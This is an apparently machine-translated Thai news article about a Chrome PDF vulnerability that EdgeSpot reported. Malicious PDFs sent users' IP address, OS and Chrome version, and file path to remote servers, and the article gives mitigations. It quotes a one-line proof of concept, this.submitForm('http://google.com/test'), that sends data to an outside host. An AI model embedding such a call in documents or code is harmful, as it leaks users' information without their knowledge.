ช่องโหว่ของ Chrome ทำให้แฮกเกอร์สามารถรวบรวมข้อมูลผู้ใช้ผ่านไฟล์ pdf
สารบัญ:
วีดีโอ: à¹à¸§à¸à¹à¸²à¸à¸±à¸ à¸à¸à¸±à¸à¸à¸´à¹à¸¨à¸© 2024
บริการตรวจจับการใช้ประโยชน์จาก EdgeSpot ค้นพบช่องโหว่ของ Chrome ที่ น่าสนใจ ตลอดทั้งวันและ ใช้ประโยชน์จากเอกสาร PDF ช่องโหว่ดังกล่าวทำให้ผู้โจมตีสามารถรวบรวมข้อมูลที่สำคัญได้โดยใช้เอกสาร PDF ที่เป็นอันตรายซึ่งเปิดอยู่ใน Chrome
ทันทีที่เหยื่อเปิดไฟล์ PDF ที่เกี่ยวข้องใน Google Chrome โปรแกรมที่เป็นอันตรายจะเริ่มทำงานในพื้นหลังโดยรวบรวมข้อมูลผู้ใช้
ข้อมูลจะถูกส่งต่อไปยังเซิร์ฟเวอร์ระยะไกลที่ถูกควบคุมโดยแฮกเกอร์ คุณอาจสงสัยว่าข้อมูลใดถูกโจมตีโดยผู้โจมตีพวกเขากำหนดเป้าหมายข้อมูลต่อไปนี้บนพีซีของคุณ:
- ที่อยู่ IP
- เส้นทางแบบเต็มของไฟล์ PDF บนระบบ
- เวอร์ชั่นของ OS และ Chrome
ระวังไฟล์ PDF ที่ติดมัลแวร์
คุณอาจประหลาดใจที่รู้ว่าไม่มีอะไรเกิดขึ้นเมื่อใช้ Adobe Reader เพื่อเปิดไฟล์ PDF นอกจากนี้คำขอ HTTP POST จะใช้ในการถ่ายโอนข้อมูลไปยังเซิร์ฟเวอร์ระยะไกลโดยไม่มีการแทรกแซงของผู้ใช้
ผู้เชี่ยวชาญพบว่าหนึ่งในสองโดเมน readnotifycom หรือ burpcollaboratornet ได้รับข้อมูล
คุณสามารถจินตนาการถึงความรุนแรงของการโจมตีโดยพิจารณาจากความจริงที่ว่าซอฟต์แวร์ป้องกันไวรัสส่วนใหญ่ไม่สามารถตรวจจับตัวอย่างที่ตรวจพบโดย EdgeSpot
ผู้เชี่ยวชาญเปิดเผยว่าผู้โจมตีกำลังใช้“ this.submitForm ()” PDF Javascript API เพื่อรวบรวมข้อมูลที่ละเอียดอ่อนของผู้ใช้
เราทดสอบด้วย PoC ขั้นต่ำการเรียก API แบบง่าย ๆ เช่น“ this.submitForm ('http://google.com/test')” จะทำให้ Google Chrome ส่งข้อมูลส่วนบุคคลไปที่ google.com
ผู้เชี่ยวชาญพบว่าข้อผิดพลาดของ Chrome นี้ถูกใช้ประโยชน์จากไฟล์ PDF ที่เป็นอันตรายสองชุด ทั้งสองถูกหมุนเวียนในเดือนตุลาคม 2017 และกันยายน 2018 ตามลำดับ
ผู้โจมตีสามารถใช้ข้อมูลที่รวบรวมได้เพื่อปรับแต่งการโจมตีในอนาคต รายงานแนะนำให้รวบรวมไฟล์ชุดแรกโดยใช้บริการติดตาม PDF ของ ReadNotify
ผู้ใช้สามารถใช้บริการเพื่อติดตามมุมมองของผู้ใช้ EdgeSpot ไม่ได้แบ่งปันรายละเอียดใด ๆ เกี่ยวกับลักษณะของไฟล์ PDF ชุดที่สอง
วิธีการป้องกันอยู่
บริการตรวจจับการใช้ประโยชน์ EdgeSpot ต้องการแจ้งเตือนผู้ใช้ผู้ใช้ Chrome เกี่ยวกับความเสี่ยงที่อาจเกิดขึ้นเนื่องจากไม่คาดว่าจะได้รับการแก้ไขในอนาคตอันใกล้
EdgeSpot รายงานไปยัง Google เกี่ยวกับช่องโหว่ในปีที่แล้วและ บริษัท สัญญาว่าจะปล่อยปะแก้ปลายเดือนเมษายน H
อย่างไรก็ตามคุณสามารถพิจารณาใช้วิธีการชั่วคราวเพื่อแก้ไขปัญหาโดยการดูเอกสาร PDF ที่ได้รับในพื้นที่โดยใช้แอพตัวอ่าน PDF ทางเลือก
หรือคุณสามารถเปิดเอกสาร PDF ของคุณใน Chrome ได้โดยยกเลิกการเชื่อมต่อระบบของคุณจากอินเทอร์เน็ต ในขณะเดียวกันคุณสามารถรอการอัปเดต Chrome 74 ที่คาดว่าจะวางจำหน่ายในวันที่ 23 เมษายน
ช่องโหว่ของ Windows เป็นช่องทางในการคุกคามมัลแวร์ doubleagent ที่เป็นอันตราย
เช่นเดียวกับชุมชนออนไลน์ที่ฟื้นตัวจากคลื่นลูกสุดท้ายของการโจมตีที่เป็นอันตรายภัยคุกคามใหม่ได้โผล่ขึ้นมาที่ทำให้ผู้ใช้ Windows ตกอยู่ในอันตราย ภัยคุกคามใหม่นี้กระทำผ่านโปรแกรมป้องกันไวรัสด้วยตนเองซึ่งทำให้คู่ควรกับชื่อ DoubleAgent DoubleAgent สามารถเข้าถึงและควบคุมไวรัสของคอมพิวเตอร์ผ่านช่องโหว่ Windows XP ...
ช่องโหว่ของ Outlook ช่วยให้แฮกเกอร์สามารถขโมยรหัสผ่านได้
Microsoft Outlook เป็นหนึ่งในแพลตฟอร์มอีเมลที่ได้รับความนิยมมากที่สุดในโลก ฉันพึ่งพาที่อยู่อีเมล Outlook ของฉันเป็นการส่วนตัวเกี่ยวกับงานและงานส่วนตัว น่าเสียดายที่ Outlook อาจไม่ปลอดภัยเท่าที่เราคิด ตามรายงานที่ตีพิมพ์โดยสถาบันวิศวกรรมซอฟต์แวร์ Carnegie Mellon, Outlook ...
ปกป้องเอกสาร pdf โดยใช้เครื่องมือต่อต้านการคัดลอก pdf ฟรี
ตอนนี้คุณสามารถหยุดผู้ใช้จากการคัดลอกข้อความ PDF ด้วยความช่วยเหลือของเครื่องมือต่อต้านการคัดลอก PDF เครื่องมือป้องกันการคัดลอก ADF มีให้ในรูปแบบซอฟต์แวร์พกพาโปรแกรม PDF ส่วนใหญ่มีตัวเลือกสำหรับการปิดการใช้งานฟังก์ชันเช่นการคัดลอกหรือการพิมพ์หรือรหัสผ่านฟีเจอร์เพื่อป้องกันเอกสาร PDF และป้องกันการเข้าถึงโดยไม่ได้รับอนุญาต ในขณะที่แคร็ก PDF ...
